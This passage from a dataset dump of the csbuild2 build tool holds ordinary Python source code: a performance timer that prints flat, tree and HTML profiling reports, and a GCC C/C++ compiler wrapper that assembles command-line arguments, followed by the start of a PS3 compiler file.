onclick=\"RenderTreeView_{0}()\">tree</a> |\n\t\t\t\t\t<a href=\"javascript:;\" onclick=\"RenderFlatView_{0}()\">flat</a>\n\t\t\t\t</div>\n\t\t\t</div>\n\t\t\t<div style=\"clear:left\" id=\"stack_{0}\"></div>\n\t\t\t</div>\n\t\t\t<script type=\"text/javascript\">Populate_{0}(1);</script>\n\t\t</div>\n\"\"\"\n]\n\n_htmlFooter = \"\"\"\t</BODY>\n</HTML>\"\"\"\n\n\ndef _formatTime(totaltime):\n\ttotalmin = math.floor(totaltime / 60)\n\ttotalsec = math.floor(totaltime % 60)\n\tmsec = math.floor((totaltime - math.floor(totaltime))*10000)\n\treturn \"{}:{:02}.{:04}\".format(int(totalmin), int(totalsec), int(msec))\n\nclass PerfTimer(object):\n\t\"\"\"\n\tPerformance timer to collect performance stats on csbuild to aid in diagnosing slow builds.\n\tUsed as a context manager around a block of code, will store cumulative execution time for that block.\n\n\t:param blockName: The name of the block to store execution for.\n\t:type blockName: str\n\t\"\"\"\n\tperfQueue = deque()\n\tperfStack = threading.local()\n\n\tdef __init__(self, blockName):\n\t\tif _collecting:\n\t\t\tself.blockName = blockName\n\t\t\tself.incstart = 0\n\t\t\tself.excstart = 0\n\t\t\tself.exclusive = 0\n\t\t\tself.inclusive = 0\n\t\t\tself.scopeName = blockName\n\n\tdef __enter__(self):\n\t\tif _collecting:\n\t\t\tnow = time.time()\n\t\t\ttry:\n\t\t\t\tprev = PerfTimer.perfStack.stack[-1]\n\t\t\t\tprev.exclusive += now - prev.excstart\n\t\t\t\tself.scopeName = prev.scopeName + \"::\" + self.blockName\n\n\t\t\t\tPerfTimer.perfStack.stack.append(self)\n\t\t\texcept:\n\t\t\t\tPerfTimer.perfStack.stack = [self]\n\n\t\t\tself.incstart = now\n\t\t\tself.excstart = now\n\n\tdef __exit__(self, excType, excVal, excTb):\n\t\tif _collecting:\n\t\t\tnow = time.time()\n\t\t\ttry:\n\t\t\t\tprev = PerfTimer.perfStack.stack[-2]\n\t\t\t\tprev.excstart = now\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\t\tself.exclusive += now - self.excstart\n\t\t\tself.inclusive = now - self.incstart\n\n\t\t\tPerfTimer.perfQueue.append((self.scopeName, self.inclusive, self.exclusive, threading.current_thread().ident))\n\t\t\tPerfTimer.perfStack.stack.pop()\n\n\t@staticmethod\n\tdef PrintPerfReport(reportMode, output=None):\n\t\t\"\"\"\n\t\tPrint out all the collected data from PerfTimers in a heirarchical tree\n\n\t\t:param reportMode: :class:`ReportMode` enum value defining how the report is output to the user.\n\t\t:type reportMode: int\n\n\t\t:param output: When the report mode is \"flat\" or \"tree, this is a function that receives each line of output (defaults to 
stdout when None).\n\t\t When the report mode is \"html\", this is the name of the file dumped by the report (defaults to the name of the main module file + \"_PERF.html\" when None).\n\t\t:type output: None or :class:`collections.Callable` or str\n\t\t\"\"\"\n\n\t\tfullreport = {}\n\t\tthreadreports = {}\n\n\t\t#pylint: disable=missing-docstring\n\t\tclass Position(object):\n\t\t\tInclusive = 0\n\t\t\tExclusive = 1\n\t\t\tCount = 2\n\t\t\tMaxInc = 3\n\t\t\tMaxExc = 4\n\t\t\tMinInc = 5\n\t\t\tMinExc = 6\n\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tpair = PerfTimer.perfQueue.popleft()\n\t\t\t\tif reportMode == ReportMode.FLAT:\n\t\t\t\t\tsplit = pair[0].rsplit(\"::\", 1)\n\t\t\t\t\tif len(split) == 2:\n\t\t\t\t\t\tkey = split[1]\n\t\t\t\t\telse:\n\t\t\t\t\t\tkey = split[0]\n\t\t\t\t\tpair = (\n\t\t\t\t\t\tkey,\n\t\t\t\t\t\tpair[1],\n\t\t\t\t\t\tpair[2],\n\t\t\t\t\t\tpair[3]\n\t\t\t\t\t)\n\n\t\t\t\tfullreport.setdefault(pair[0], [0,0,0,0,0,999999999,999999999])\n\t\t\t\tfullreport[pair[0]][Position.Inclusive] += pair[1]\n\t\t\t\tfullreport[pair[0]][Position.Exclusive] += pair[2]\n\t\t\t\tfullreport[pair[0]][Position.Count] += 1\n\t\t\t\tfullreport[pair[0]][Position.MaxInc] = max(pair[1], fullreport[pair[0]][Position.MaxInc])\n\t\t\t\tfullreport[pair[0]][Position.MaxExc] = max(pair[2], fullreport[pair[0]][Position.MaxExc])\n\t\t\t\tfullreport[pair[0]][Position.MinInc] = min(pair[1], fullreport[pair[0]][Position.MinInc])\n\t\t\t\tfullreport[pair[0]][Position.MinExc] = min(pair[2], fullreport[pair[0]][Position.MinExc])\n\n\t\t\t\tthreadreport = threadreports.setdefault(pair[3], {})\n\t\t\t\tthreadreport.setdefault(pair[0], [0,0,0,0,0,999999999,999999999])\n\t\t\t\tthreadreport[pair[0]][Position.Inclusive] += pair[1]\n\t\t\t\tthreadreport[pair[0]][Position.Exclusive] += pair[2]\n\t\t\t\tthreadreport[pair[0]][Position.Count] += 1\n\t\t\t\tthreadreport[pair[0]][Position.MaxInc] = max(pair[1], threadreport[pair[0]][Position.MaxInc])\n\t\t\t\tthreadreport[pair[0]][Position.MaxExc] = max(pair[2], threadreport[pair[0]][Position.MaxExc])\n\t\t\t\tthreadreport[pair[0]][Position.MinInc] = min(pair[1], threadreport[pair[0]][Position.MinInc])\n\t\t\t\tthreadreport[pair[0]][Position.MinExc] = min(pair[2], threadreport[pair[0]][Position.MinExc])\n\t\t\texcept IndexError:\n\t\t\t\tbreak\n\n\t\tif not fullreport:\n\t\t\treturn\n\n\t\tif reportMode == ReportMode.HTML:\n\t\t\tif output is None:\n\t\t\t\toutput = os.path.join(os.path.dirname(sys.modules[\"__main__\"].__file__), os.path.basename(os.path.splitext(sys.modules[\"__main__\"].__file__)[0] + \"_PERF.html\"))\n\n\t\t\twith open(output, \"w\") as f:\n\t\t\t\t#pylint: disable=missing-docstring\n\t\t\t\tclass SharedLocals(object):\n\t\t\t\t\tidentifiers = {}\n\t\t\t\t\tlastId = {}\n\t\t\t\t\ttotalExc = 0\n\t\t\t\t\ttotalCount = 0\n\t\t\t\t\tmaxExcMean = 0\n\t\t\t\t\tmaxIncMean = 0\n\t\t\t\t\tmaxExcMax = 0\n\t\t\t\t\tmaxExcMin = 0\n\t\t\t\t\tmaxIncMax = 0\n\t\t\t\t\tmaxIncMin = 0\n\n\t\t\t\t#pylint: disable=invalid-name\n\t\t\t\tdef _getIdentifier(s):\n\t\t\t\t\t_,_,base = s.rpartition(\"::\")\n\t\t\t\t\tif s not in SharedLocals.identifiers:\n\t\t\t\t\t\tSharedLocals.identifiers[s] = SharedLocals.lastId.setdefault(base, 0)\n\t\t\t\t\t\tSharedLocals.lastId[base] += 1\n\t\t\t\t\treturn base + \"\\\\x0b\" * SharedLocals.identifiers[s]\n\n\t\t\t\tdef _recurseHtml(report, sortedKeys, prefix, printed, itemfmt, indent):\n\t\t\t\t\tfirst = True\n\t\t\t\t\tfor key in sortedKeys:\n\t\t\t\t\t\tif key in printed:\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\tif 
key.startswith(prefix):\n\t\t\t\t\t\t\treportEntry = report[key]\n\t\t\t\t\t\t\treportIncMean = reportEntry[Position.Inclusive] / reportEntry[Position.Count]\n\t\t\t\t\t\t\treportExcMean = reportEntry[Position.Exclusive] / reportEntry[Position.Count]\n\n\t\t\t\t\t\t\tprintkey = key.replace(prefix, \"\", 1)\n\t\t\t\t\t\t\tif printkey.find(\"::\") != -1:\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\tif not first:\n\t\t\t\t\t\t\t\tf.write(\"\\t\" * (indent+1))\n\t\t\t\t\t\t\t\tf.write(\"],\\n\")\n\t\t\t\t\t\t\tf.write(\"\\n\")\n\t\t\t\t\t\t\tf.write(\"\\t\" * (indent+1))\n\t\t\t\t\t\t\tf.write(\n\t\t\t\t\t\t\t\titemfmt.format(\n\t\t\t\t\t\t\t\t\tprintkey,\n\t\t\t\t\t\t\t\t\treportEntry[Position.Inclusive],\n\t\t\t\t\t\t\t\t\treportEntry[Position.Exclusive],\n\t\t\t\t\t\t\t\t\treportEntry[Position.Count],\n\t\t\t\t\t\t\t\t\treportEntry[Position.MaxInc],\n\t\t\t\t\t\t\t\t\treportEntry[Position.MinInc],\n\t\t\t\t\t\t\t\t\treportIncMean,\n\t\t\t\t\t\t\t\t\treportEntry[Position.MaxExc],\n\t\t\t\t\t\t\t\t\treportEntry[Position.MinExc],\n\t\t\t\t\t\t\t\t\treportExcMean,\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t)\n\n\t\t\t\t\t\t\tSharedLocals.totalExc += reportEntry[Position.Exclusive]\n\t\t\t\t\t\t\tSharedLocals.totalCount += reportEntry[Position.Count]\n\t\t\t\t\t\t\tSharedLocals.maxExcMean = max(SharedLocals.maxExcMean, reportExcMean)\n\t\t\t\t\t\t\tSharedLocals.maxIncMean = max(SharedLocals.maxIncMean, reportIncMean)\n\t\t\t\t\t\t\tSharedLocals.maxExcMax = max(SharedLocals.maxExcMax, reportEntry[Position.MaxExc])\n\t\t\t\t\t\t\tSharedLocals.maxIncMax = max(SharedLocals.maxIncMax, reportEntry[Position.MaxInc])\n\t\t\t\t\t\t\tSharedLocals.maxExcMin = max(SharedLocals.maxExcMin, reportEntry[Position.MinExc])\n\t\t\t\t\t\t\tSharedLocals.maxIncMin = max(SharedLocals.maxIncMin, reportEntry[Position.MinInc])\n\n\t\t\t\t\t\t\tf.write(\"\\t\" * (indent+2))\n\t\t\t\t\t\t\tf.write(\"[\")\n\t\t\t\t\t\t\tprinted.add(key)\n\t\t\t\t\t\t\t_recurseHtml(report, sortedKeys, key + \"::\", printed, itemfmt, indent + 2)\n\t\t\t\t\t\t\tfirst = False\n\t\t\t\t\tif not first:\n\t\t\t\t\t\tf.write(\"\\t\" * (indent+1))\n\t\t\t\t\t\tf.write(\"]\\n\")\n\t\t\t\t\t\tf.write(\"\\t\" * indent)\n\t\t\t\t\tf.write(\"]\\n\")\n\n\t\t\t\tdef _printReportHtml(report, threadId):\n\t\t\t\t\tif not report:\n\t\t\t\t\t\treturn\n\t\t\t\t\ttotalcount = 0\n\t\t\t\t\tfor key in report:\n\t\t\t\t\t\ttotalcount += report[key][Position.Count]\n\n\t\t\t\t\tsortedKeys = sorted(report, reverse=True, key=lambda x: report[x][0] if reportMode == ReportMode.TREE else report[x][1])\n\n\t\t\t\t\tthreadScriptId = threadId.replace(\" \", \"_\")\n\t\t\t\t\tf.write(_blocks[0].format(threadScriptId, threadId))\n\n\t\t\t\t\tf.write(\"\\t\\t\\t\\t\\t\\t['<{}_root>', null, 0, 0 ],\\n\".format(threadScriptId))\n\t\t\t\t\tfor key in sortedKeys:\n\t\t\t\t\t\tparent, _, thisKey = key.rpartition(\"::\")\n\t\t\t\t\t\tident = _getIdentifier(key)\n\t\t\t\t\t\tf.write(\"\\t\\t\\t\\t\\t\\t['\" + ident + \"', \")\n\t\t\t\t\t\tif parent:\n\t\t\t\t\t\t\tf.write(\"'\" + _getIdentifier(parent) + \"', \")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tf.write(\"'<{}_root>',\".format(threadScriptId))\n\t\t\t\t\t\tf.write(str(report[key][0]))\n\t\t\t\t\t\tf.write(\", \")\n\t\t\t\t\t\tf.write(str(report[key][0]))\n\t\t\t\t\t\tf.write(\"],\\n\")\n\n\t\t\t\t\t\texclusiveIdent = _getIdentifier(key + \"::<\" +thisKey + \">\")\n\t\t\t\t\t\tf.write(\"\\t\\t\\t\\t\\t\\t['\" + exclusiveIdent + \"', \")\n\t\t\t\t\t\tf.write(\"'\" + ident + \"', \")\n\t\t\t\t\t\tf.write(str(max(report[key][1], 
0.0000000001)))\n\t\t\t\t\t\tf.write(\", \")\n\t\t\t\t\t\tf.write(str(max(report[key][1], 0.0000000001)))\n\t\t\t\t\t\tf.write(\"],\\n\")\n\n\t\t\t\t\tf.write(_blocks[1].format(threadScriptId, threadId))\n\n\t\t\t\t\titemfmt = \"[ \\\"{}\\\", {}, {}, {}, {}, {}, {}, {}, {}, {},\\n\"\n\t\t\t\t\tprinted = set()\n\t\t\t\t\tfirst = True\n\t\t\t\t\tfor key in sortedKeys:\n\t\t\t\t\t\treportEntry = report[key]\n\t\t\t\t\t\treportIncMean = reportEntry[Position.Inclusive] / reportEntry[Position.Count]\n\t\t\t\t\t\treportExcMean = reportEntry[Position.Exclusive] / reportEntry[Position.Count]\n\n\t\t\t\t\t\tif key in printed:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tif key.find(\"::\") != -1:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tif not first:\n\t\t\t\t\t\t\tf.write(\"\\t\\t\\t\\t\\t],\\n\")\n\t\t\t\t\t\tf.write(\"\\t\\t\\t\\t\\t\")\n\t\t\t\t\t\tf.write(\n\t\t\t\t\t\t\titemfmt.format(\n\t\t\t\t\t\t\t\tkey,\n\t\t\t\t\t\t\t\treportEntry[Position.Inclusive],\n\t\t\t\t\t\t\t\treportEntry[Position.Exclusive],\n\t\t\t\t\t\t\t\treportEntry[Position.Count],\n\t\t\t\t\t\t\t\treportEntry[Position.MaxInc],\n\t\t\t\t\t\t\t\treportEntry[Position.MinInc],\n\t\t\t\t\t\t\t\treportIncMean,\n\t\t\t\t\t\t\t\treportEntry[Position.MaxExc],\n\t\t\t\t\t\t\t\treportEntry[Position.MinExc],\n\t\t\t\t\t\t\t\treportExcMean,\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\t)\n\n\t\t\t\t\t\tSharedLocals.totalExc += reportEntry[Position.Exclusive]\n\t\t\t\t\t\tSharedLocals.totalCount += reportEntry[Position.Count]\n\t\t\t\t\t\tSharedLocals.maxExcMean = max(SharedLocals.maxExcMean, reportExcMean)\n\t\t\t\t\t\tSharedLocals.maxIncMean = max(SharedLocals.maxIncMean, reportIncMean)\n\t\t\t\t\t\tSharedLocals.maxExcMax = max(SharedLocals.maxExcMax, reportEntry[Position.MaxExc])\n\t\t\t\t\t\tSharedLocals.maxIncMax = max(SharedLocals.maxIncMax, reportEntry[Position.MaxInc])\n\t\t\t\t\t\tSharedLocals.maxExcMin = max(SharedLocals.maxExcMin, reportEntry[Position.MinExc])\n\t\t\t\t\t\tSharedLocals.maxIncMin = max(SharedLocals.maxIncMin, reportEntry[Position.MinInc])\n\t\t\t\t\t\tf.write(\"\\t\\t\\t\\t\\t\\t[\")\n\n\t\t\t\t\t\t_recurseHtml(report, sortedKeys, key + \"::\", printed, itemfmt, 6)\n\t\t\t\t\t\tfirst = False\n\n\t\t\t\t\tf.write(\n\t\t\t\t\t\t\"\\t\\t\\t\\t\\t]\"\n\t\t\t\t\t\t\"\\n\\t\\t\\t\\t]\"\n\t\t\t\t\t)\n\t\t\t\t\tf.write(\"\\n\\t\\t\\t\\tvar totals_{} = [{}, {}, {}, {}, {}, {}, {}, {}]\\n\".format(\n\t\t\t\t\t\tthreadScriptId, SharedLocals.totalExc, SharedLocals.totalCount,\n\t\t\t\t\t\tSharedLocals.maxIncMax, SharedLocals.maxIncMin, SharedLocals.maxIncMean,\n\t\t\t\t\t\tSharedLocals.maxExcMax, SharedLocals.maxExcMin, SharedLocals.maxExcMean,\n\t\t\t\t\t))\n\t\t\t\t\tf.write(_blocks[2].format(threadScriptId, threadId))\n\n\t\t\t\tf.write(_htmlHeader.format(os.path.basename(sys.modules[\"__main__\"].__file__)))\n\n\t\t\t\tfor threadId, report in threadreports.items():\n\t\t\t\t\tif threadId == threading.current_thread().ident:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t_printReportHtml(report, \"Worker Thread {}\".format(threadId))\n\n\t\t\t\t_printReportHtml(threadreports[threading.current_thread().ident], \"Main Thread\")\n\t\t\t\tif len(threadreports) != 1:\n\t\t\t\t\t_printReportHtml(fullreport, \"CUMULATIVE\")\n\n\t\t\t\tf.write(_htmlFooter)\n\n\t\telse:\n\t\t\tif output is None:\n\t\t\t\t#pylint: disable=invalid-name,missing-docstring\n\t\t\t\tdef printIt(*args, **kwargs):\n\t\t\t\t\tprint(*args, **kwargs)\n\t\t\t\toutput = printIt\n\t\t\toutput(\"Perf reports:\")\n\n\t\t\tdef _recurse(report, sortedKeys, prefix, replacementText, printed, 
itemfmt):\n\t\t\t\tprev = (None, None)\n\n\t\t\t\tfor key in sortedKeys:\n\t\t\t\t\tif key in printed:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tif key.startswith(prefix):\n\t\t\t\t\t\tprintkey = key.replace(prefix, replacementText, 1)\n\t\t\t\t\t\tif printkey.find(\"::\") != -1:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tif prev != (None, None):\n\t\t\t\t\t\t\treportEntry = report[prev[1]]\n\t\t\t\t\t\t\treportIncMean = reportEntry[Position.Inclusive] / reportEntry[Position.Count]\n\t\t\t\t\t\t\treportExcMean = reportEntry[Position.Exclusive] / reportEntry[Position.Count]\n\t\t\t\t\t\t\toutput(\n\t\t\t\t\t\t\t\titemfmt.format(\n\t\t\t\t\t\t\t\t\tprev[0],\n\t\t\t\t\t\t\t\t\t_formatTime(reportEntry[Position.Inclusive]),\n\t\t\t\t\t\t\t\t\t_formatTime(reportEntry[Position.Exclusive]),\n\t\t\t\t\t\t\t\t\treportEntry[Position.Count],\n\t\t\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MinInc]),\n\t\t\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MaxInc]),\n\t\t\t\t\t\t\t\t\t_formatTime(reportIncMean),\n\t\t\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MinExc]),\n\t\t\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MaxExc]),\n\t\t\t\t\t\t\t\t\t_formatTime(reportExcMean),\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\tprinted.add(prev[1])\n\t\t\t\t\t\t\t_recurse(report, sortedKeys, prev[1] + \"::\", replacementText[:-4] + \" \\u2502 \" + \" \\u251c\\u2500 \", printed, itemfmt)\n\t\t\t\t\t\tprev = (printkey, key)\n\n\t\t\t\tif prev != (None, None):\n\t\t\t\t\tprintkey = prev[0].replace(\"\\u251c\", \"\\u2514\")\n\t\t\t\t\treportEntry = report[prev[1]]\n\t\t\t\t\treportIncMean = reportEntry[Position.Inclusive] / reportEntry[Position.Count]\n\t\t\t\t\treportExcMean = reportEntry[Position.Exclusive] / reportEntry[Position.Count]\n\t\t\t\t\toutput(\n\t\t\t\t\t\titemfmt.format(\n\t\t\t\t\t\t\tprintkey,\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.Inclusive]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.Exclusive]),\n\t\t\t\t\t\t\treportEntry[Position.Count],\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MinInc]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MaxInc]),\n\t\t\t\t\t\t\t_formatTime(reportIncMean),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MinExc]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MaxExc]),\n\t\t\t\t\t\t\t_formatTime(reportExcMean),\n\t\t\t\t\t\t)\n\t\t\t\t\t)\n\t\t\t\t\tprinted.add(prev[1])\n\t\t\t\t\t_recurse(report, sortedKeys, prev[1] + \"::\", replacementText[:-4] + \" \" + \" \\u251c\\u2500 \", printed, itemfmt)\n\n\t\t\tdef _alteredKey(key):\n\t\t\t\treturn re.sub(\"([^:]*::)\", \" \", key)\n\n\t\t\tdef _printReport(report, threadId):\n\t\t\t\tif not report:\n\t\t\t\t\treturn\n\n\t\t\t\tmaxlen = len(str(threadId))\n\t\t\t\ttotalcount = 0\n\t\t\t\tfor key in report:\n\t\t\t\t\tmaxlen = max(len(_alteredKey(key)), maxlen)\n\t\t\t\t\ttotalcount += report[key][2]\n\n\t\t\t\toutput(\"\")\n\t\t\t\tlinefmt = \"+={{:=<{}}}=+============+============+===========+============+============+============+============+============+============+\".format(maxlen)\n\t\t\t\tline = linefmt.format('')\n\t\t\t\toutput(line)\n\t\t\t\theaderfmt = \"| {{:<{}}} | INCLUSIVE | EXCLUSIVE | CALLS | INC_MIN | INC_MAX | INC_MEAN | EXC_MIN | EXC_MAX | EXC_MEAN |\".format(maxlen)\n\t\t\t\toutput(headerfmt.format(threadId))\n\t\t\t\toutput(line)\n\t\t\t\titemfmt = \"| {{:{}}} | {{:>10}} | {{:>10}} | {{:>9}} | {{:>10}} | {{:>10}} | {{:>10}} | {{:>10}} | {{:>10}} | {{:>10}} |\".format(maxlen)\n\t\t\t\tprinted = set()\n\t\t\t\tsortedKeys = sorted(report, reverse=True, key=lambda x: report[x][0] if 
reportMode == ReportMode.TREE else report[x][1])\n\t\t\t\ttotal = 0\n\t\t\t\tfor key in sortedKeys:\n\t\t\t\t\tif key in printed:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif key.find(\"::\") != -1:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\treportEntry = report[key]\n\t\t\t\t\toutput(\n\t\t\t\t\t\titemfmt.format(\n\t\t\t\t\t\t\tkey,\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.Inclusive]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.Exclusive]),\n\t\t\t\t\t\t\treportEntry[Position.Count],\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MinInc]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MaxInc]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.Inclusive] / report[key][Position.Count]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MinExc]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MaxExc]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.Exclusive] / report[key][Position.Count]),\n\t\t\t\t\t\t)\n\t\t\t\t\t)\n\t\t\t\t\tif reportMode == ReportMode.FLAT:\n\t\t\t\t\t\ttotal += reportEntry[Position.Exclusive]\n\t\t\t\t\telse:\n\t\t\t\t\t\ttotal += reportEntry[Position.Inclusive]\n\t\t\t\t\t_recurse(report, sortedKeys, key + \"::\", \" \\u251c\\u2500 \", printed, itemfmt)\n\n\t\t\t\toutput(line)\n\n\t\t\tfor threadId, report in threadreports.items():\n\t\t\t\tif threadId == threading.current_thread().ident:\n\t\t\t\t\tcontinue\n\n\t\t\t\t_printReport(report, \"Worker Thread {}\".format(threadId))\n\n\t\t\t_printReport(threadreports[threading.current_thread().ident], \"Main Thread\")\n\t\t\tif len(threadreports) != 1:\n\t\t\t\t_printReport(fullreport, \"CUMULATIVE\")\n" }, { "alpha_fraction": 0.6542056202888489, "alphanum_fraction": 0.6585802435874939, "avg_line_length": 33.92361068725586, "blob_id": "9724717d5d056501118282f8d71c6280546ad3a2", "content_id": "73d891b6ee3ce79271f457e84318b166f1b2047e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5029, "license_type": "no_license", "max_line_length": 121, "num_lines": 144, "path": "/csbuild/tools/cpp_compilers/gcc_cpp_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: gcc_cpp_compiler\n\t:synopsis: gcc compiler tool for C++\n\n.. moduleauthor:: Jaedyn K. 
Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nimport csbuild\n\nfrom .cpp_compiler_base import CppCompilerBase\nfrom ..common.tool_traits import HasDebugLevel, HasOptimizationLevel\nfrom ... import log\nfrom ..._utils import response_file, shared_globals\n\nDebugLevel = HasDebugLevel.DebugLevel\nOptimizationLevel = HasOptimizationLevel.OptimizationLevel\n\ndef _ignore(_):\n\tpass\n\nclass GccCppCompiler(CppCompilerBase):\n\t\"\"\"\n\tGCC compiler implementation\n\t\"\"\"\n\tsupportedArchitectures = {\"x86\", \"x64\", \"arm\", \"arm64\"}\n\toutputFiles = {\".o\"}\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getOutputFiles(self, project, inputFile):\n\t\tintDirPath = project.GetIntermediateDirectory(inputFile)\n\t\tfilename = os.path.splitext(os.path.basename(inputFile.filename))[0] + \".o\"\n\t\treturn tuple({ os.path.join(intDirPath, filename) })\n\n\tdef _getCommand(self, project, inputFile, isCpp):\n\t\tcmdExe = self._getComplierName(project, isCpp)\n\t\tcmd = self._getDefaultArgs(project) \\\n\t\t\t+ self._getCustomArgs(project, isCpp) \\\n\t\t\t+ self._getArchitectureArgs(project) \\\n\t\t\t+ self._getOptimizationArgs() \\\n\t\t\t+ self._getDebugArgs() \\\n\t\t\t+ self._getSystemArgs(project, isCpp) \\\n\t\t\t+ self._getLanguageStandardArgs(isCpp) \\\n\t\t\t+ self._getPreprocessorArgs() \\\n\t\t\t+ self._getIncludeDirectoryArgs() \\\n\t\t\t+ self._getOutputFileArgs(project, inputFile) \\\n\t\t\t+ self._getInputFileArgs(inputFile)\n\n\t\tinputFileBasename = os.path.basename(inputFile.filename)\n\t\tresponseFile = response_file.ResponseFile(project, \"{}-{}\".format(inputFile.uniqueDirectoryId, inputFileBasename), cmd)\n\n\t\tif shared_globals.showCommands:\n\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\treturn [cmdExe, \"@{}\".format(responseFile.filePath)]\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getComplierName(self, project, isCpp):\n\t\t_ignore(project)\n\t\treturn \"g++\" if isCpp else \"gcc\"\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = [\"--pass-exit-codes\"]\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\targs.append(\"-fPIC\")\n\t\treturn args\n\n\tdef _getCustomArgs(self, project, isCpp):\n\t\t_ignore(project)\n\t\treturn self._globalFlags + (self._cxxFlags if isCpp else self._cFlags)\n\n\tdef _getInputFileArgs(self, inputFile):\n\t\treturn [\"-c\", inputFile.filename]\n\n\tdef _getOutputFileArgs(self, project, inputFile):\n\t\toutputFiles = self._getOutputFiles(project, inputFile)\n\t\treturn [\"-o\", outputFiles[0]]\n\n\tdef _getPreprocessorArgs(self):\n\t\treturn [\"-D{}\".format(d) for d in self._defines] + [\"-U{}\".format(u) for u in self._undefines]\n\n\tdef _getIncludeDirectoryArgs(self):\n\t\treturn [\"-I{}\".format(d) for d in self._includeDirectories]\n\n\tdef _getDebugArgs(self):\n\t\tif self._debugLevel != DebugLevel.Disabled:\n\t\t\treturn [\"-g\"]\n\t\treturn []\n\n\tdef _getOptimizationArgs(self):\n\t\targ = 
{\n\t\t\tOptimizationLevel.Size: \"s\",\n\t\t\tOptimizationLevel.Speed: \"fast\",\n\t\t\tOptimizationLevel.Max: \"3\",\n\t\t}\n\t\treturn [\"-O{}\".format(arg.get(self._optLevel, \"0\"))]\n\n\tdef _getArchitectureArgs(self, project):\n\t\targs = {\n\t\t\t\"x86\": [\"-m32\"],\n\t\t\t\"x64\": [\"-m64\"],\n\t\t}.get(project.architectureName, [])\n\t\treturn args\n\n\tdef _getSystemArgs(self, project, isCpp):\n\t\t_ignore(project)\n\t\t_ignore(isCpp)\n\t\treturn []\n\n\tdef _getLanguageStandardArgs(self, isSourceCpp):\n\t\tstandard = self._cxxStandard if isSourceCpp else self._ccStandard\n\t\targ = \"-std={}\".format(standard) if standard else None\n\t\treturn [arg]\n" }, { "alpha_fraction": 0.6684373021125793, "alphanum_fraction": 0.6758053302764893, "avg_line_length": 37.14379119873047, "blob_id": "fbe6939765f7923cbeea4cc07836d0982197c4fe", "content_id": "bf8b08576a5130ec95bb8b96a1fb905a32f448d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5836, "license_type": "no_license", "max_line_length": 121, "num_lines": 153, "path": "/csbuild/tools/cpp_compilers/ps3_cpp_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, 